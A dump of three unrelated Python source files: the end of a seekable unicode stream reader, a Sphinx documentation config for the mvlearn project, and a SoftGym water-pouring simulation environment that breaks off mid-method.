chars = ''.join(self.linebuffer) + chars
self.linebuffer = None
self._rewind_numchars = None
return chars
def readline(self, size=None):
"""
Read a line of text, decode it using this reader's encoding,
and return the resulting unicode string.
:param size: The maximum number of bytes to read. If no
newline is encountered before ``size`` bytes have been read,
then the returned value may not be a complete line of text.
:type size: int
"""
# If we have a non-empty linebuffer, then return the first
# line from it. (Note that the last element of linebuffer may
# not be a complete line; so let _read() deal with it.)
if self.linebuffer and len(self.linebuffer) > 1:
line = self.linebuffer.pop(0)
self._rewind_numchars += len(line)
return line
readsize = size or 72
chars = ''
# If there's a remaining incomplete line in the buffer, add it.
if self.linebuffer:
chars += self.linebuffer.pop()
self.linebuffer = None
while True:
startpos = self.stream.tell() - len(self.bytebuffer)
new_chars = self._read(readsize)
# If we're at a '\r', then read one extra character, since
# it might be a '\n', to get the proper line ending.
if new_chars and new_chars.endswith('\r'):
new_chars += self._read(1)
chars += new_chars
lines = chars.splitlines(True)
if len(lines) > 1:
line = lines[0]
self.linebuffer = lines[1:]
self._rewind_numchars = len(new_chars)-(len(chars)-len(line))
self._rewind_checkpoint = startpos
break
elif len(lines) == 1:
line0withend = lines[0]
line0withoutend = lines[0].splitlines(False)[0]
if line0withend != line0withoutend: # complete line
line = line0withend
break
if not new_chars or size is not None:
line = chars
break
# Read successively larger blocks of text.
if readsize < 8000:
readsize *= 2
return line
def readlines(self, sizehint=None, keepends=True):
"""
Read this file's contents, decode them using this reader's
encoding, and return it as a list of unicode lines.
:rtype: list(unicode)
:param sizehint: Ignored.
:param keepends: If false, then strip newlines.
"""
return self.read().splitlines(keepends)
def next(self):
"""Return the next decoded line from the underlying stream."""
line = self.readline()
if line: return line
else: raise StopIteration
def __next__(self):
return self.next()
def __iter__(self):
"""Return self"""
return self
def xreadlines(self):
"""Return self"""
return self
#/////////////////////////////////////////////////////////////////
# Pass-through methods & properties
#/////////////////////////////////////////////////////////////////
@property
def closed(self):
"""True if the underlying stream is closed."""
return self.stream.closed
@property
def name(self):
"""The name of the underlying stream."""
return self.stream.name
@property
def mode(self):
"""The mode of the underlying stream."""
return self.stream.mode
def close(self):
"""
Close the underlying stream.
"""
self.stream.close()
#/////////////////////////////////////////////////////////////////
# Seek and tell
#/////////////////////////////////////////////////////////////////
def seek(self, offset, whence=0):
"""
Move the stream to a new file position. If the reader is
maintaining any buffers, tehn they will be cleared.
:param offset: A byte count offset.
:param whence: If 0, then the offset is from the start of the file
(offset should be positive), if 1, then the offset is from the
current position (offset may be positive or negative); and if 2,
then the offset is from the end of the file (offset should
typically be negative).
"""
if whence == 1:
raise ValueError('Relative seek is not supported for '
'SeekableUnicodeStreamReader -- consider '
'using char_seek_forward() instead.')
self.stream.seek(offset, whence)
self.linebuffer = None
self.bytebuffer = b''
self._rewind_numchars = None
self._rewind_checkpoint = self.stream.tell()
def char_seek_forward(self, offset):
"""
Move the read pointer forward by ``offset`` characters.
"""
if offset < 0:
raise ValueError('Negative offsets are not supported')
# Clear all buffers.
self.seek(self.tell())
# Perform the seek operation.
self._char_seek_forward(offset)
def _char_seek_forward(self, offset, est_bytes=None):
"""
Move the file position forward by ``offset`` characters,
ignoring all buffers.
:param est_bytes: A hint, giving an estimate of the number of
bytes that will be neded to move forward by ``offset`` chars.
Defaults to ``offset``.
"""
if est_bytes is None: est_bytes = offset
bytes = b''
while True:
# Read in a block of bytes.
newbytes = self.stream.read(est_bytes-len(bytes))
bytes += newbytes
# Decode the bytes to characters.
chars, bytes_decoded = self._incr_decode(bytes)
# If we got the right number of characters, then seek
# backwards over any truncated characters, and return.
if len(chars) == offset:
self.stream.seek(-len(bytes)+bytes_decoded, 1)
return
# If we went too far, then we can back-up until we get it
# right, using the bytes we've already read.
if len(chars) > offset:
while len(chars) > offset:
# Assume at least one byte/char.
est_bytes += offset-len(chars)
chars, bytes_decoded = self._incr_decode(bytes[:est_bytes])
self.stream.seek(-len(bytes)+bytes_decoded, 1)
return
# Otherwise, we haven't read enough bytes yet; loop again.
est_bytes += offset - len(chars)
def tell(self):
"""
Return the current file position on the underlying byte
stream. If this reader is maintaining any buffers, then the
returned file position will be the position of the beginning
of those buffers.
"""
# If nothing's buffered, then just return our current filepos:
if self.linebuffer is None:
return self.stream.tell() - len(self.bytebuffer)
# Otherwise, we'll need to backtrack the filepos until we
# reach the beginning of the buffer.
# Store our original file position, so we can return here.
orig_filepos = self.stream.tell()
# Calculate an estimate of where we think the newline is.
bytes_read = ( (orig_filepos-len(self.bytebuffer)) -
self._rewind_checkpoint )
buf_size = sum(len(line) for line in self.linebuffer)
est_bytes = int((bytes_read * self._rewind_numchars /
(self._rewind_numchars + buf_size)))
self.stream.seek(self._rewind_checkpoint)
self._char_seek_forward(self._rewind_numchars, est_bytes)
filepos = self.stream.tell()
# Sanity check
if self.DEBUG:
self.stream.seek(filepos)
check1 = self._incr_decode(self.stream.read(50))[0]
check2 = ''.join(self.linebuffer)
assert check1.startswith(check2) or check2.startswith(check1)
# Return to our original filepos (so we don't have to throw
# out our buffer.)
self.stream.seek(orig_filepos)
# Return the calculated filepos
return filepos
#/////////////////////////////////////////////////////////////////
# Helper methods
#/////////////////////////////////////////////////////////////////
def _read(self, size=None):
"""
Read up to ``size`` bytes from the underlying stream, decode
them using this reader's encoding, and return the resulting
unicode string. ``linebuffer`` is not included in the result.
"""
if size == 0: return ''
# Skip past the byte order marker, if present.
if self._bom and self.stream.tell() == 0:
self.stream.read(self._bom)
# Read the requested number of bytes.
if size is None:
new_bytes = self.stream.read()
else:
new_bytes = self.stream.read(size)
bytes = self.bytebuffer + new_bytes
# Decode the bytes into unicode characters
chars, bytes_decoded = self._incr_decode(bytes)
# If we got bytes but couldn't decode any, then read further.
if (size is not None) and (not chars) and (len(new_bytes) > 0):
while not chars:
new_bytes = self.stream.read(1)
if not new_bytes: break # end of file.
bytes += new_bytes
chars, bytes_decoded = self._incr_decode(bytes)
# Record any bytes we didn't consume.
self.bytebuffer = bytes[bytes_decoded:]
# Return the result
return chars
def _incr_decode(self, bytes):
"""
Decode the given byte string into a unicode string, using this
reader's encoding. If an exception is encountered that
appears to be caused by a truncation error, then just decode
the byte string without the bytes that cause the trunctaion
error.
Return a tuple ``(chars, num_consumed)``, where ``chars`` is
the decoded unicode string, and ``num_consumed`` is the
number of bytes that were consumed.
"""
while True:
try:
return self.decode(bytes, 'strict')
except UnicodeDecodeError as exc:
# If the exception occurs at the end of the string,
# then assume that it's a truncation error.
if exc.end == len(bytes):
return self.decode(bytes[:exc.start], self.errors)
# Otherwise, if we're being strict, then raise it.
elif self.errors == 'strict':
raise
# If we're not strict, then re-process it with our
# errors setting. This *may* raise an exception.
else:
return self.decode(bytes, self.errors)
_BOM_TABLE = {
'utf8': [(codecs.BOM_UTF8, None)],
'utf16': [(codecs.BOM_UTF16_LE, 'utf16-le'),
(codecs.BOM_UTF16_BE, 'utf16-be')],
'utf16le': [(codecs.BOM_UTF16_LE, None)],
'utf16be': [(codecs.BOM_UTF16_BE, None)],
'utf32': [(codecs.BOM_UTF32_LE, 'utf32-le'),
(codecs.BOM_UTF32_BE, 'utf32-be')],
'utf32le': [(codecs.BOM_UTF32_LE, None)],
'utf32be': [(codecs.BOM_UTF32_BE, None)],
}
def _check_bom(self):
# Normalize our encoding name
enc = re.sub('[ -]', '', self.encoding.lower())
# Look up our encoding in the BOM table.
bom_info = self._BOM_TABLE.get(enc)
if bom_info:
# Read a prefix, to check against the BOM(s)
bytes = self.stream.read(16)
self.stream.seek(0)
# Check for each possible BOM.
for (bom, new_encoding) in bom_info:
if bytes.startswith(bom):
if new_encoding: self.encoding = new_encoding
return len(bom)
return None
__all__ = ['path', 'PathPointer', 'FileSystemPathPointer', 'BufferedGzipFile',
'GzipFileSystemPathPointer', 'GzipFileSystemPathPointer',
'find', 'retrieve', 'FORMATS', 'AUTO_FORMATS', 'load',
'show_cfg', 'clear_cache', 'LazyLoader', 'OpenOnDemandZipFile',
'GzipFileSystemPathPointer', 'SeekableUnicodeStreamReader']
|
the-stack_0_19852 | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
from distutils.version import LooseVersion
import matplotlib
# Use RTD Theme
import sphinx_rtd_theme
import sphinx_gallery
sys.path.insert(0, os.path.abspath(".."))
# -- Project information -----------------------------------------------------
project = "mvlearn"
copyright = "2019-2020"
authors = u"Richard Guo, Ronan Perry, Gavin Mischler, Theo Lee, " \
"Alexander Chang, Arman Koul, Cameron Franz"
# The short X.Y version
# Find mvlearn version.
PROJECT_PATH = os.path.dirname(os.path.abspath(__file__))
for line in open(os.path.join(PROJECT_PATH, "..", "mvlearn", "__init__.py")):
if line.startswith("__version__ = "):
version = line.strip().split()[2][1:-1]
# The full version, including alpha/beta/rc tags
release = "alpha"
# -- Extension configuration -------------------------------------------------
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"sphinx.ext.mathjax",
"sphinx.ext.napoleon",
"sphinx.ext.ifconfig",
"sphinx.ext.githubpages",
"sphinx.ext.intersphinx",
'sphinx_gallery.gen_gallery',
]
if LooseVersion(sphinx_gallery.__version__) < LooseVersion('0.2'):
raise ImportError('Must have at least version 0.2 of sphinx-gallery, got '
'%s' % (sphinx_gallery.__version__,))
matplotlib.use('agg')
# -- sphinxcontrib.rawfiles
#rawfiles = ["CNAME"]
# -- numpydoc
# Below is needed to prevent errors
numpydoc_show_class_members = False
# -- sphinx.ext.autosummary
autosummary_generate = True
# -- sphinx.ext.autodoc
autoclass_content = "both"
autodoc_default_flags = ["members", "inherited-members"]
autodoc_member_order = "bysource" # default is alphabetical
# -- sphinx.ext.intersphinx
intersphinx_mapping = {
"numpy": ("https://docs.scipy.org/doc/numpy", None),
"python": ("https://docs.python.org/3", None),
"scipy": ("https://docs.scipy.org/doc/scipy/reference", None),
"sklearn": ("http://scikit-learn.org/dev", None),
}
# -- sphinx options ----------------------------------------------------------
source_suffix = ".rst"
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store", "**.ipynb_checkpoints"]
master_doc = "index"
source_encoding = "utf-8"
# -- Options for HTML output -------------------------------------------------
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
html_static_path = ["_static"]
modindex_common_prefix = ["mvlearn."]
pygments_style = "sphinx"
smartquotes = False
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
html_theme_options = {
# 'includehidden': False,
"collapse_navigation": False,
"navigation_depth": 3,
"logo_only": True,
}
html_logo = "./figures/mvlearn-logo-transparent-white.png"
html_context = {
# Enable the "Edit in GitHub link within the header of each page.
"display_github": True,
# Set the following variables to generate the resulting github URL for each page.
# Format Template: https://{{ github_host|default("github.com") }}/{{ github_user }}/{{ github_repo }}/blob/{{ github_version }}{{ conf_py_path }}{{ pagename }}{{ suffix }}
"github_user": "mvlearn",
"github_repo": "mvlearn",
"github_version": "master/docs/",
}
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "mvlearndoc"
# -- Options for LaTeX output ------------------------------------------------
def setup(app):
# to hide/show the prompt in code examples:
app.add_javascript("js/copybutton.js")
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, "mvlearn.tex", "mvlearn Documentation", authors, "manual")
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "mvlearn", "mvlearn Documentation", [authors], 1)]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"mvlearn",
"mvlearn Documentation",
authors,
"mvlearn",
"One line description of project.",
"Miscellaneous",
)
]
# intersphinx configuration
intersphinx_mapping = {
'python': ('https://docs.python.org/{.major}'.format(
sys.version_info), None),
'numpy': ('https://docs.scipy.org/doc/numpy/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/reference', None),
'matplotlib': ('https://matplotlib.org/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'joblib': ('https://joblib.readthedocs.io/en/latest/', None),
'seaborn': ('https://seaborn.pydata.org/', None),
}
sphinx_gallery_conf = {
'doc_module': ('mvlearn',),
'examples_dirs': '../examples',
'gallery_dirs': 'auto_examples',
'reference_url': {
'mvlearn': None,
}
}
|
the-stack_0_19854 | import numpy as np
from gym.spaces import Box
import pyflex
from softgym.envs.fluid_env import FluidEnv
import copy
from softgym.utils.misc import rotate_rigid_object, quatFromAxisAngle
from shapely.geometry import Polygon
import random, math
class PourWaterPosControlEnv(FluidEnv):
def __init__(self, observation_mode, action_mode,
config=None, cached_states_path='pour_water_init_states.pkl', **kwargs):
'''
This class implements a pouring water task.
observation_mode: "cam_rgb" or "point_cloud" or "key_point"
action_mode: "rotation_bottom, rotation_top"
'''
assert observation_mode in ['cam_rgb', 'point_cloud', 'key_point']
assert action_mode in ['rotation_bottom', 'rotation_top']
if action_mode == 'rotation_top':
cached_states_path = 'pour_water_init_states_top.pkl'
self.observation_mode = observation_mode
self.action_mode = action_mode
self.wall_num = 5 # number of glass walls. floor/left/right/front/back
super().__init__(**kwargs)
self.get_cached_configs_and_states(cached_states_path, self.num_variations)
if observation_mode in ['point_cloud', 'key_point']:
if observation_mode == 'key_point':
obs_dim = 0
obs_dim += 13 # Pos (x, z, theta) and shape (w, h, l) of the two cups and the water height.
else:
max_particle_num = 13 * 13 * 13 * 4
obs_dim = max_particle_num * 3
self.particle_obs_dim = obs_dim
# z and theta of the second cup (poured_glass) does not change and thus are omitted.
# add: frac of water in control cup, frac of water in target cup
self.observation_space = Box(low=np.array([-np.inf] * obs_dim), high=np.array([np.inf] * obs_dim), dtype=np.float32)
elif observation_mode == 'cam_rgb':
self.observation_space = Box(low=-np.inf, high=np.inf, shape=(self.camera_height, self.camera_width, 3),
dtype=np.float32)
default_config = self.get_default_config()
border = default_config['glass']['border']
if action_mode in ["rotation_bottom", "rotation_top"]:
self.action_direct_dim = 3
# control the (x, y) corrdinate of the floor center, and theta its rotation angle.
action_low = np.array([-0.01, -0.01, -0.015])
action_high = np.array([0.01, 0.01, 0.015])
self.action_space = Box(action_low, action_high, dtype=np.float32)
else:
raise NotImplementedError
self.prev_reward = 0
self.reward_min = 0
self.reward_max = 1
self.reward_range = self.reward_max - self.reward_min
def get_default_config(self):
config = {
'fluid': {
'radius': 0.033,
'rest_dis_coef': 0.55,
'cohesion': 0.1, # not actually used, instead, is computed as viscosity * 0.01
'viscosity': 2,
'surfaceTension': 0,
'adhesion': 0.0, # not actually used, instead, is computed as viscosity * 0.001
'vorticityConfinement': 40,
'solidpressure': 0.,
'dim_x': 8,
'dim_y': 18,
'dim_z': 8,
},
'glass': {
'border': 0.045,
'height': 0.6,
'glass_distance': 1.0,
'poured_border': 0.04,
'poured_height': 0.6,
},
'camera_name': 'default_camera',
}
return config
def generate_env_variation(self, num_variations=5, config=None, **kwargs):
dim_xs = [4, 5, 6, 7, 8, 9, 10, 11, 12, 13]
dim_zs = [4, 5, 6, 7, 8, 9, 10, 11, 12, 13]
self.cached_configs = []
self.cached_init_states = []
if config is None:
config = self.get_default_config()
config_variations = [copy.deepcopy(config) for _ in range(num_variations)]
for idx in range(num_variations):
print("pour water generate env variations {}".format(idx))
dim_x = random.choice(dim_xs)
dim_z = random.choice(dim_zs)
m = min(dim_x, dim_z)
p = np.random.rand()
water_radius = config['fluid']['radius'] * config['fluid']['rest_dis_coef']
if p < 0.5: # midium water volumes
print("generate env variation: medium volume water")
dim_y = int(3.5 * m)
v = dim_x * dim_y * dim_z
h = v / ((dim_x + 1) * (dim_z + 1)) * water_radius / 2
glass_height = h + (np.random.rand() - 0.5) * 0.001 + config['glass']['border']
else:
print("generate env variation: large volume water")
dim_y = 4 * m
v = dim_x * dim_y * dim_z
h = v / ((dim_x + 1) * (dim_z + 1)) * water_radius / 3
glass_height = h + (m + np.random.rand()) * 0.001 + config['glass']['border']
config_variations[idx]['fluid']['dim_x'] = dim_x
config_variations[idx]['fluid']['dim_y'] = dim_y
config_variations[idx]['fluid']['dim_z'] = dim_z
# if you want to change viscosity also, uncomment this
# config_variations[idx]['fluid']['viscosity'] = self.rand_float(2.0, 10.0)
config_variations[idx]['glass']['height'] = glass_height
config_variations[idx]['glass']['poured_height'] = glass_height + np.random.rand() * 0.1
config_variations[idx]['glass']['glass_distance'] = self.rand_float(0.05 * m, 0.09 * m) + (dim_x + 4) * water_radius / 2.
config_variations[idx]['glass']['poured_border'] = 0.03
self.set_scene(config_variations[idx])
init_state = copy.deepcopy(self.get_state())
self.cached_configs.append(config_variations[idx])
self.cached_init_states.append(init_state)
combined = [self.cached_configs, self.cached_init_states]
return self.cached_configs, self.cached_init_states
def get_config(self):
if self.deterministic:
config_idx = 0
else:
config_idx = np.random.randint(len(self.config_variations))
self.config = self.config_variations[config_idx]
return self.config
def _reset(self):
'''
reset to environment to the initial state.
return the initial observation.
'''
self.inner_step = 0
self.performance_init = None
info = self._get_info()
self.performance_init = info['performance']
pyflex.step(render=True)
return self._get_obs()
def get_state(self):
'''
get the postion, velocity of flex particles, and postions of flex shapes.
'''
particle_pos = pyflex.get_positions()
particle_vel = pyflex.get_velocities()
shape_position = pyflex.get_shape_states()
return {'particle_pos': particle_pos, 'particle_vel': particle_vel, 'shape_pos': shape_position,
'glass_x': self.glass_x, 'glass_y': self.glass_y, 'glass_rotation': self.glass_rotation,
'glass_states': self.glass_states, 'poured_glass_states': self.poured_glass_states,
'glass_params': self.glass_params, 'config_id': self.current_config_id}
def set_state(self, state_dic):
'''
set the postion, velocity of flex particles, and postions of flex shapes.
'''
pyflex.set_positions(state_dic["particle_pos"])
pyflex.set_velocities(state_dic["particle_vel"])
pyflex.set_shape_states(state_dic["shape_pos"])
self.glass_x = state_dic['glass_x']
self.glass_y = state_dic['glass_y']
self.glass_rotation = state_dic['glass_rotation']
self.glass_states = state_dic['glass_states']
self.poured_glass_states = state_dic['poured_glass_states']
for _ in range(5):
pyflex.step()
def initialize_camera(self):
self.camera_params = {
'default_camera': {'pos': np.array([1.4, 1.5, 0.1]),
'angle': np.array([0.45 * np.pi, -60 / 180. * np.pi, 0]),
'width': self.camera_width,
'height': self.camera_height},
'cam_2d': {'pos': np.array([0.5, .7, 4.]),
'angle': np.array([0, 0, 0.]),
'width': self.camera_width,
'height': self.camera_height}
}
def set_poured_glass_params(self, config):
params = config
self.glass_distance = params['glass_distance']
self.poured_border = params['poured_border']
self.poured_height = params['poured_height']
fluid_radis = self.fluid_params['radius'] * self.fluid_params['rest_dis_coef']
self.poured_glass_dis_x = self.fluid_params['dim_x'] * fluid_radis + 0.07 # glass floor length
self.poured_glass_dis_z = self.fluid_params['dim_z'] * fluid_radis + 0.07 # glass width
params['poured_glass_dis_x'] = self.poured_glass_dis_x
params['poured_glass_dis_z'] = self.poured_glass_dis_z
params['poured_glass_x_center'] = self.x_center + params['glass_distance']
self.glass_params.update(params)
def set_pouring_glass_params(self, config):
params = config
self.border = params['border']
self.height = params['height']
fluid_radis = self.fluid_params['radius'] * self.fluid_params['rest_dis_coef']
self.glass_dis_x = self.fluid_params['dim_x'] * fluid_radis + 0.1 # glass floor length
self.glass_dis_z = self.fluid_params['dim_z'] * fluid_radis + 0.1 # glass width
params['glass_dis_x'] = self.glass_dis_x
params['glass_dis_z'] = self.glass_dis_z
params['glass_x_center'] = self.x_center
self.glass_params = params
def set_scene(self, config, states=None, create_only=False):
'''
Construct the pouring water scence.
'''
# create fluid
super().set_scene(config) # do not sample fluid parameters, as it's very likely to generate very strange fluid
# compute glass params
if states is None:
self.set_pouring_glass_params(config["glass"])
self.set_poured_glass_params(config["glass"])
else:
glass_params = states['glass_params']
self.border = glass_params['border']
self.height = glass_params['height']
self.glass_dis_x = glass_params['glass_dis_x']
self.glass_dis_z = glass_params['glass_dis_z']
self.glass_distance = glass_params['glass_distance']
self.poured_border = glass_params['poured_border']
self.poured_height = glass_params['poured_height']
self.poured_glass_dis_x = glass_params['poured_glass_dis_x']
self.poured_glass_dis_z = glass_params['poured_glass_dis_z']
self.glass_params = glass_params
# create pouring glass & poured glass
self.create_glass(self.glass_dis_x, self.glass_dis_z, self.height, self.border)
self.create_glass(self.poured_glass_dis_x, self.poured_glass_dis_z, self.poured_height, self.poured_border)
# move pouring glass to be at ground
self.glass_states = self.init_glass_state(self.x_center, 0, self.glass_dis_x, self.glass_dis_z, self.height, self.border)
# move poured glass to be at ground
self.poured_glass_states = self.init_glass_state(self.x_center + self.glass_distance, 0,
self.poured_glass_dis_x, self.poured_glass_dis_z, self.poured_height, self.poured_border)
self.set_shape_states(self.glass_states, self.poured_glass_states)
# record glass floor center x, y, and rotation
self.glass_x = self.x_center
if self.action_mode == 'rotation_bottom':
self.glass_y = 0
elif self.action_mode == 'rotation_top':
self.glass_y = 0.5 * self.border + self.height
self.glass_rotation = 0
# only create the glass and water, without setting their states
# this is only used in the pourwater amount env.
if create_only:
return
# no cached init states passed in
if states is None:
fluid_pos = np.ones((self.particle_num, self.dim_position))
# move water all inside the glass
fluid_radius = self.fluid_params['radius'] * self.fluid_params['rest_dis_coef']
fluid_dis = np.array([1.0 * fluid_radius, fluid_radius * 0.5, 1.0 * fluid_radius])
lower_x = self.glass_params['glass_x_center'] - self.glass_params['glass_dis_x'] / 2. + self.glass_params['border']
lower_z = -self.glass_params['glass_dis_z'] / 2 + self.glass_params['border']
lower_y = self.glass_params['border']
if self.action_mode in ['sawyer', 'franka']:
lower_y += 0.56 # NOTE: robotics table
lower = np.array([lower_x, lower_y, lower_z])
cnt = 0
rx = int(self.fluid_params['dim_x'] * 1)
ry = int(self.fluid_params['dim_y'] * 1)
rz = int(self.fluid_params['dim_z'] / 1)
for x in range(rx):
for y in range(ry):
for z in range(rz):
fluid_pos[cnt][:3] = lower + np.array([x, y, z]) * fluid_dis # + np.random.rand() * 0.01
cnt += 1
pyflex.set_positions(fluid_pos)
print("stablize water!")
for _ in range(100):
pyflex.step()
state_dic = self.get_state()
water_state = state_dic['particle_pos'].reshape((-1, self.dim_position))
in_glass = self.in_glass(water_state, self.glass_states, self.border, self.height)
not_in_glass = 1 - in_glass
not_total_num = np.sum(not_in_glass)
while not_total_num > 0:
max_height_now = np.max(water_state[:, 1])
fluid_dis = np.array([1.0 * fluid_radius, fluid_radius * 1, 1.0 * fluid_radius])
lower_x = self.glass_params['glass_x_center'] - self.glass_params['glass_dis_x'] / 4
lower_z = -self.glass_params['glass_dis_z'] / 4
lower_y = max_height_now
lower = np.array([lower_x, lower_y, lower_z])
cnt = 0
dim_x = config['fluid']['dim_x']
dim_z = config['fluid']['dim_z']
for w_idx in range(len(water_state)):
if not in_glass[w_idx]:
water_state[w_idx][:3] = lower + fluid_dis * np.array([cnt % dim_x, cnt // (dim_x * dim_z), (cnt // dim_x) % dim_z])
cnt += 1
pyflex.set_positions(water_state)
for _ in range(40):
pyflex.step()
state_dic = self.get_state()
water_state = state_dic['particle_pos'].reshape((-1, self.dim_position))
in_glass = self.in_glass(water_state, self.glass_states, self.border, self.height)
not_in_glass = 1 - in_glass
not_total_num = np.sum(not_in_glass)
for _ in range(30):
pyflex.step()
else: # set to passed-in cached init states
self.set_state(states)
def _get_obs(self):
'''
return the observation based on the current flex state.
'''
if self.observation_mode == 'cam_rgb':
return self.get_image(self.camera_width, self.camera_height)
elif self.observation_mode == 'point_cloud':
particle_pos = np.array(pyflex.get_positions()).reshape([-1, 4])[:, :3].flatten()
pos = np.zeros(shape=self.particle_obs_dim, dtype=np.float)
pos[:len(particle_pos)] = particle_pos
return pos.flatten()
elif 'key_point' in self.observation_mode:
pos = np.empty(0, dtype=np.float)
water_state = pyflex.get_positions().reshape([-1, 4])
in_poured_glass = self.in_glass(water_state, self.poured_glass_states, self.poured_border, self.poured_height)
in_control_glass = self.in_glass(water_state, self.glass_states, self.border, self.height)
in_poured_glass = float(np.sum(in_poured_glass)) / len(water_state)
in_control_glass = float(np.sum(in_control_glass)) / len(water_state)
cup_state = np.array([self.glass_x, self.glass_y, self.glass_rotation, self.glass_dis_x, self.glass_dis_z, self.height,
self.glass_distance + self.glass_x, self.poured_height, self.poured_glass_dis_x, self.poured_glass_dis_z,
self._get_current_water_height(), in_poured_glass, in_control_glass])
return np.hstack([pos, cup_state]).flatten()
else:
raise NotImplementedError
def compute_reward(self, obs=None, action=None, set_prev_reward=False):
"""
The reward is computed as the fraction of water in the poured glass.
NOTE: the obs and action params are made here to be compatiable with the MultiTask env wrapper.
"""
state_dic = self.get_state()
water_state = state_dic['particle_pos'].reshape((-1, self.dim_position))
water_num = len(water_state)
in_poured_glass = self.in_glass(water_state, self.poured_glass_states, self.poured_border, self.poured_height)
in_control_glass = self.in_glass(water_state, self.glass_states, self.border, self.height)
good_water = in_poured_glass * (1 - in_control_glass)
good_water_num = np.sum(good_water)
reward = float(good_water_num) / water_num
return reward
def _get_info(self):
# Duplicate of the compute reward function!
state_dic = self.get_state()
water_state = state_dic['particle_pos'].reshape((-1, self.dim_position))
water_num = len(water_state)
in_poured_glass = self.in_glass(water_state, self.poured_glass_states, self.poured_border, self.poured_height)
in_control_glass = self.in_glass(water_state, self.glass_states, self.border, self.height)
good_water = in_poured_glass * (1 - in_control_glass)
good_water_num = np.sum(good_water)
performance = float(good_water_num) / water_num
performance_init = performance if self.performance_init is None else self.performance_init # Use the original performance
return {
'normalized_performance': (performance - performance_init) / (self.reward_max - performance_init),
'performance': performance
}
def _step(self, action):
'''
action: np.ndarray of dim 1x3, (x, y, theta). (x, y) specifies the floor center coordinate, and theta
specifies the rotation.
'''
# make action as increasement, clip its range
move = action[:2]
rotate = action[2]
move = np.clip(move, a_min=self.action_space.low[0], a_max=self.action_space.high[0])
rotate = np.clip(rotate, a_min=self.action_space.low[2], a_max=self.action_space.high[2])
dx, dy, dtheta = move[0], move[1], rotate
x, y, theta = self.glass_x + dx, self.glass_y + dy, self.glass_rotation + dtheta
# check if the movement of the pouring glass collide with the poured glass.
# the action only take effects if there is no collision
new_states = self.rotate_glass(self.glass_states, x, y, theta)
if not self.judge_glass_collide(new_states, theta) and self.above_floor(new_states, theta):
self.glass_states = new_states
self.glass_x, self.glass_y, self.glass_rotation = x, y, theta
else: # invalid move, old state becomes the same as the current state
self.glass_states[:, 3:6] = self.glass_states[:, :3].copy()
self.glass_states[:, 10:] = self.glass_states[:, 6:10].copy()
# pyflex takes a step to update the glass and the water fluid
self.set_shape_states(self.glass_states, self.poured_glass_states)
pyflex.step(render=True)
self.inner_step += 1
def create_glass(self, glass_dis_x, glass_dis_z, height, border):
"""
the glass is a box, with each wall of it being a very thin box in Flex.
each wall of the real box is represented by a box object in Flex with really small thickness (determined by the param border)
dis_x: the length of the glass
dis_z: the width of the glass
height: the height of the glass.
border: the thickness of the glass wall.
the halfEdge determines the center point of each wall.
Note: this is merely setting the length of each dimension of the wall, but not the actual position of them.
That's why left and right walls have exactly the same params, and so do front and back walls.
"""
center = np.array([0., 0., 0.])
quat = quatFromAxisAngle([0, 0, -1.], 0.)
boxes = []
# floor
halfEdge = np.array([glass_dis_x / 2. + border, border / 2., glass_dis_z / 2. + border])
boxes.append([halfEdge, center, quat])
# left wall
halfEdge = np.array([border / 2., (height) / 2., glass_dis_z / 2. + border])
boxes.append([halfEdge, center, quat])
# right wall
boxes.append([halfEdge, center, quat])
# back wall
halfEdge = np.array([(glass_dis_x) / 2., (height) / 2., border / 2.])
boxes.append([halfEdge, center, quat])
# front wall
boxes.append([halfEdge, center, quat])
for i in range(len(boxes)):
halfEdge = boxes[i][0]
center = boxes[i][1]
quat = boxes[i][2]
pyflex.add_box(halfEdge, center, quat)
return boxes
def rotate_glass(self, prev_states, x, y, theta):
'''
given the previous states of the glass, rotate it with angle theta.
update the states of the 5 boxes that form the box: floor, left/right wall, back/front wall.
rotate the glass, where the center point is the center of the floor or the top.
state:
0-3: current (x, y, z) coordinate of the center point
3-6: previous (x, y, z) coordinate of the center point
6-10: current quat
10-14: previous quat
'''
dis_x, dis_z = self.glass_dis_x, self.glass_dis_z
quat_curr = quatFromAxisAngle([0, 0, -1.], theta)
border = self.border
# states of 5 walls
states = np.zeros((5, self.dim_shape_state))
for i in range(5):
states[i][3:6] = prev_states[i][:3]
states[i][10:] = prev_states[i][6:10]
x_center = x
# rotation center is the floor center
rotate_center = np.array([x_center, y, 0.])
if self.action_mode == 'rotation_bottom':
# floor: center position does not change
states[0, :3] = np.array([x_center, y, 0.])
# left wall: center must move right and move down.
relative_coord = np.array([-(dis_x+ border) / 2., (self.height) / 2., 0.])
states[1, :3] = rotate_rigid_object(center=rotate_center, axis=np.array([0, 0, -1]), angle=theta, relative=relative_coord)
# right wall
